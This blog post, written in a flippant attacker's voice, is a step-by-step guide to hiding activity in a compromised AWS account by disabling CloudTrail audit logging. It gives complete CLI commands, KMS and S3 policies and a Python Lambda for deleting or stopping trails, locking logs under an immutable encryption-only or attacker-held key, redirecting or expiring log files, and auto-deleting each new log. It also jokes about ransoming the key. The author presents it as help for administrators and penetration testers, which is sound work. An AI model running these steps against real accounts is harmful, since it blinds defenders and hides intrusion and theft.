So you’ve pwned an AWS account (congratulations!) and now what? You’re eager to get to the data theft, amirite? What about that whole cyber kill chain thing: installation, command & control, actions on objectives?
What if someone is watching? Too many questions guy… Let’s just disable logging and move on to the fun stuff.
The main source of audit log data in AWS is CloudTrail.
You can use AWS CloudTrail to get a history of AWS API calls and related events for your account. This includes calls made by using the AWS Management Console, AWS SDKs, command line tools, and higher-level AWS services.
Let’s check out which trails are enabled:
aws cloudtrail describe-trails
If you see an empty list, you might want to send your victim a t-shirt and thank them for their participation, kind of like a reverse bug bounty. If you see one or more trails, the fun starts now.
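For reference, a populated result looks roughly like this (abridged, and with made-up values; the field names come from the CloudTrail API):
{
    "trailList": [
        {
            "Name": "my-trail",
            "S3BucketName": "my-trail-bucket",
            "IncludeGlobalServiceEvents": true,
            "IsMultiRegionTrail": true,
            "HomeRegion": "us-east-1",
            "TrailARN": "arn:aws:cloudtrail:us-east-1:123456789012:trail/my-trail"
        }
    ]
}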
Depending on your mood (and occasionally your pwned account’s access policy), AWS offers a buffet of options. So much so, I used to be indecisive but now I’m not so sure.
Starting with the most obvious and loudest option, deleting the CloudTrail:
aws cloudtrail delete-trail --name [my-trail]
Only slightly less obvious, disabling logging:
aws cloudtrail stop-logging --name [my-trail]
Your target may be actively monitoring both of those API calls so those tactics are probably best left to nights of drunken regret and forcefully purged with tequila.
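If you’d rather look before you leap, a quick (and far from exhaustive) way to see whether anything is watching is to list CloudWatch Events rules and alarms. This assumes your pwned credentials can read them, and the names are obviously whatever the victim chose:
aws events list-rules --query 'Rules[].Name'
aws cloudwatch describe-alarms --query 'MetricAlarms[].AlarmName'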
Most resources in AWS are region specific. CloudTrail is a little different: a trail can be configured to log globally across all regions. Multi-region logging is the default, so a trail bound only to its home region isn’t common, and that makes the setting a perfect target for manipulation. Disabling multi-region logging gives you free rein in every region except for the one the trail was created in.
aws cloudtrail update-trail --name [my-trail] --no-is-multi-region-trail --no-include-global-service-events
You may have noticed two flags being unset in the above command. The second also “specifies whether the trail is publishing events from global services such as IAM”, which is handy if you want to, say, create some backdoor accounts and API keys. It can only be unset if the first is also unset, which is unfortunate for stealthiness.
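Trust but verify; both flags should now come back false:
aws cloudtrail describe-trails --trail-name-list [my-trail]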
One of the great things about AWS is they’ve really thought about security. In fact, they’ve created many services specifically designed and dedicated to security. For example, the Key Management Service (KMS) tightly integrates with other services to provide almost seamless encryption. It just so happens that integration includes CloudTrail.
It’s a little bit more effort to get CloudTrail encryption bootstrapped, but it’s well worth it. Once enabled, log files will be encrypted but everything else will look normal; configuration will remain almost identical and log files will continue to be delivered to the correct location, in the expected structure.
First, let’s set up a policy file for a new key, ensuring it only allows encryption by CloudTrail and nothing else; we don’t want those pesky administrators using it for decryption. Note the references to [account-id] and [user-id], which have to be replaced as appropriate.
{
    "Version": "2012-10-17",
    "Id": "Key policy created for CloudTrail",
    "Statement": [
        {
            "Sid": "Enable IAM User Permissions",
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::[account-id]:user/[user-id]"
            },
            "Action": [
                "kms:DisableKey",
                "kms:ScheduleKeyDeletion",
                "kms:GenerateDataKey*",
                "kms:DescribeKey"
            ],
            "Resource": "*"
        },
        {
            "Sid": "Allow CloudTrail to encrypt logs",
            "Effect": "Allow",
            "Principal": {
                "Service": "cloudtrail.amazonaws.com"
            },
            "Action": "kms:GenerateDataKey*",
            "Resource": "*",
            "Condition": {
                "StringLike": {
                    "kms:EncryptionContext:aws:cloudtrail:arn": "arn:aws:cloudtrail:*:[account-id]:trail/*"
                }
            }
        },
        {
            "Sid": "Allow CloudTrail to describe key",
            "Effect": "Allow",
            "Principal": {
                "Service": "cloudtrail.amazonaws.com"
            },
            "Action": "kms:DescribeKey",
            "Resource": "*"
        }
    ]
}
AWS policies default to deny, so anything this policy doesn’t explicitly allow is blocked, including changing the policy itself (nobody is granted kms:PutKeyPolicy). While not useful in itself, it’s a painful kick to the nether regions, requiring manual Support intervention to undo.
Create a key, attaching the policy:
aws kms create-key --bypass-policy-lockout-safety-check --policy [file:///my-policy.json]
The “bypass-policy-lockout-safety-check” flag allows you to make the key’s policy immutable after creation, turning logging into an exercise in lighting money on fire with disk consumption. You can’t say Amazon didn’t warn you!
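As a hypothetical illustration (the policy file name here is made up), any later attempt to repair the key policy should be denied, because nobody holds kms:PutKeyPolicy on the key:
aws kms put-key-policy --key-id [my-key] --policy-name default --policy [file:///sane-policy.json]
Expect an AccessDeniedException back, every time, until Support steps in.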
Finally, put it all together by encrypting the target trail with the immutable encryption-only key:
aws cloudtrail update-trail --name [my-trail] --kms-key-id [my-key]
While that’s by far the slickest encryption tactic, there are others. You can start encrypting a trail, disable the key, and schedule it for deletion. If you aren’t going to disable the key, you can remove the disable and delete actions from the policy to make the key undeletable (it’s a word, trust me); a sketch of that trimmed statement follows the commands below.
aws kms disable-key --key-id [my-key]
aws kms schedule-key-deletion --key-id [my-key] --pending-window-in-days 7
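For the undeletable flavour, the first statement of the key policy from earlier would shrink to something like this (a sketch, with the same placeholders as before):
{
    "Sid": "Enable IAM User Permissions",
    "Effect": "Allow",
    "Principal": {
        "AWS": "arn:aws:iam::[account-id]:user/[user-id]"
    },
    "Action": [
        "kms:GenerateDataKey*",
        "kms:DescribeKey"
    ],
    "Resource": "*"
}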
The deletion won’t happen for 7 days, but the trail won’t be written to in the meantime regardless. Manually inspecting the trail in the AWS web interface won’t show any signs of failure either, unless the victim is familiar enough with the interface to notice a missing ‘last delivered’ section. However, checking the trail status via the CLI will show “LatestDeliveryError” as “KMS.DisabledException”.
aws cloudtrail get-trail-status --name [my-trail]
Finally, if you really wanted to be mean, you could set the encryption key to be one hosted in another account you control. The only minor change required to the base tactic is to ensure the condition on the “GenerateDataKey*” statement references the victim’s account-id, as sketched below.
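Something like this, in the key policy on your side of the fence ([victim-account-id] is a placeholder for the compromised account):
"Condition": {
    "StringLike": {
        "kms:EncryptionContext:aws:cloudtrail:arn": "arn:aws:cloudtrail:*:[victim-account-id]:trail/*"
    }
}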
If you wanted to be even meaner and found out your victim knew you did this mean thing, you could send them an email suggesting they make a one time tax-free donation to get a copy of the key. That’s a joke — ransomware is pure evil and needs to die in a fire but doing it through AWS does add some dramatic effect, no?
CloudTrail logs are written to S3 buckets, so they can be redirected to a separate account owned by someone else. You know, like… you. Or better yet, a cyber-patsy™ (I thought this blog was cyber free?). The S3 namespace is global and world writable buckets are more plentiful than poop in my kid’s nappies, and that’s saying a lot! More on that at some point in the future (the buckets, not the poop).
aws cloudtrail update-trail --name [my-trail] --s3-bucket-name [cyber-patsy-bucket]
I know what you are thinking. Scrap that, I barely know what I am thinking but this S3 bucket stuff is interesting, right?
Targeting the S3 bucket where logs are being written has some distinct advantages. It’s much stealthier than manipulating a trail directly. It’s also more likely to be an available option in a more restricted account context.
As with encryption keys, it is possible to delete a bucket being used for logging.
aws s3 rb --force [s3://my-bucket]
The results are much the same, except that the failure is very visible when the affected trail is viewed in the AWS web console.
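The CLI status check from earlier works here too; expect “LatestDeliveryError” to surface an S3-flavoured error (something like “NoSuchBucket”, though I’m quoting that from memory):
aws cloudtrail get-trail-status --name [my-trail]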
Similarly, it’s possible to update the bucket policy to prevent CloudTrail from writing to it. Simply delete the “AWSCloudTrailWrite20150319” statement from the default generated policy, shown here in full:
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AWSCloudTrailAclCheck20150319",
            "Effect": "Allow",
            "Principal": {
                "Service": "cloudtrail.amazonaws.com"
            },
            "Action": "s3:GetBucketAcl",
            "Resource": "arn:aws:s3:::[my-bucket]"
        },
        {
            "Sid": "AWSCloudTrailWrite20150319",
            "Effect": "Allow",
            "Principal": {
                "Service": "cloudtrail.amazonaws.com"
            },
            "Action": "s3:PutObject",
            "Resource": "arn:aws:s3:::[my-bucket]/*",
            "Condition": {
                "StringEquals": {
                    "s3:x-amz-acl": "bucket-owner-full-control"
                }
            }
        }
    ]
}
Then write the trimmed policy back to the bucket.
aws s3api put-bucket-policy --bucket [my-bucket] --policy [file:///my-policy.json]
Again, logging will stop and the web console will display a policy error when viewing the affected trail.
I did attempt to abuse bucket ACLs (these are separate from policies, not sure why) but came up with nothing. Even removing the owner’s ACL wasn’t effective, as it could simply be reinstated by the bucket owner.
One of the stealthiest but riskiest options to disrupt logging is to manipulate the target bucket’s lifecycle policy. Buckets can be configured to automatically delete objects after one (or more) days.
aws s3api put-bucket-lifecycle-configuration \
--bucket [my-bucket] \
--lifecycle-configuration [file://s3-lifecycle-config.json]
{
    "Rules": [
        {
            "Status": "Enabled",
            "Prefix": "",
            "Expiration": {
                "Days": 1
            },
            "ID": "Rule for the Entire Bucket"
        }
    ]
}
It’s unlikely this tactic will be monitored; however, log files will still live for one day, and any external ingestion of those files into a SIEM is likely to proceed unimpeded.
There’s an elephant in the room. Have you seen it? Simply deleting the log files immediately once they are written hasn’t been mentioned. That’s because AWS, being awesome, provides an automated mechanism infinitely better than manually deleting the files, and I left it till last. Introducing AWS Lambda.
AWS Lambda is a compute service where you can upload your code to AWS Lambda and the service can run the code on your behalf using AWS infrastructure. After you upload your code and create what we call a Lambda function, AWS Lambda takes care of provisioning and managing the servers that you use to run the code. You can use AWS Lambda as … an event-driven compute service where AWS Lambda runs your code in response to events, such as changes to data in an Amazon S3 bucket…
Setting up a Lambda function to immediately delete anything written to an S3 bucket is a little louder and more involved than any other tactic discussed, but it’s worth it. Because the Lambda function is invoked directly by S3, it will win any race against other code attempting to consume files written to the bucket, effectively making them invisible.
To get it going, create a role that can be assumed by Lambda.
aws iam create-role \
--role-name [lambda_s3_innocent_role] \
--assume-role-policy-document [file:///iam-assume-by-lambda.json]
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Service": "lambda.amazonaws.com"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}
Create a policy to attach to the role that allows Lambda to delete S3 objects and whatever else you like. You could also update an existing policy for extra stealth.
aws iam create-policy \
--policy-name [lambda_s3_innocent_policy] \
--policy-document [file:///lambda-s3-delete-policy.json]
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "logs:CreateLogGroup",
                "logs:CreateLogStream",
                "logs:PutLogEvents"
            ],
            "Resource": "arn:aws:logs:*:*:*"
        },
        {
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:PutObject",
                "s3:DeleteObject",
                "s3:DeleteObjectVersion"
            ],
            "Resource": [
                "arn:aws:s3:::*"
            ]
        }
    ]
}
Attach the policy to the role.
aws iam attach-role-policy \
--role-name [lambda_s3_innocent_role] \
--policy-arn arn:aws:iam::[account-id]:policy/[lambda_s3_innocent_policy]
Create the actual Lambda Python function code that will delete the S3 object passed to it every time it is invoked.
import urllib.parse

import boto3

s3 = boto3.client('s3')

def lambda_handler(event, context):
    # S3 event notifications deliver one or more records; grab the first.
    bucket = event['Records'][0]['s3']['bucket']['name']
    # Object keys arrive URL-encoded (e.g. spaces as '+'), so decode first.
    key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'])
    try:
        # Delete the freshly written log file before anything else can read it.
        s3.delete_object(Bucket=bucket, Key=key)
    except Exception as e:
        print(e)
        raise
Compress the code and register the function.
zip my_code.zip my_code.py
aws lambda create-function \
--region [region] \
--function-name [innocent_function] \
--zip-file [fileb:///my_code.zip] \
--role arn:aws:iam::[account-id]:role/[lambda_s3_innocent_role] \
--handler [my_code].lambda_handler \
--runtime python3.12 \
--timeout 3 \
--memory-size 128 \
--publish
Permit Lambda to be invoked by S3.
aws lambda add-permission \
--function-name [innocent_function] \
--statement-id [my-guid] \
--principal s3.amazonaws.com \
--action lambda:InvokeFunction \
--source-arn arn:aws:s3:::[my-bucket]
Configure the bucket to call Lambda every time it creates an object.
aws s3api put-bucket-notification-configuration \
--bucket [my-bucket] \
--notification-configuration [file:///s3-notify-config.json]
{
    "LambdaFunctionConfigurations": [
        {
            "LambdaFunctionArn": "arn:aws:lambda:[my-region]:[account-id]:function:[my-function]",
            "Id": "[my-guid]",
            "Events": [
                "s3:ObjectCreated:*"
            ]
        }
    ]
}
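A quick sanity check that the notification actually stuck (an empty response means it didn’t take):
aws s3api get-bucket-notification-configuration --bucket [my-bucket]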
Easy, right? Kind of, maybe, at least? There’s more good news though.
The Lambda free tier includes 1M free requests per month and 400,000 GB-seconds of compute time per month.
Unusual billing patterns tip off administrators more often than people would like to admit, but this tactic combined with the Lambda free tier conveniently avoids those awkward moments.
This article was written under the assumption that you have access to an AWS API key or role with some reasonably broad permissions and an up-to-date awscli installation.
More importantly, it was written to enlighten AWS account administrators and improve legitimate penetration testing TTPs. In fact, as I wrote this article, engineers at my workplace implemented mitigations and tested for the gaps this work identified. Regardless, let’s not fool ourselves: our foes are orders of magnitude smarter than me and probably also know what “orders of magnitude” means precisely. Help?
Go forth and conquer.
Want to learn to hack AWS? I offer immersive online and in-person training to corporate teams at hackaws.cloud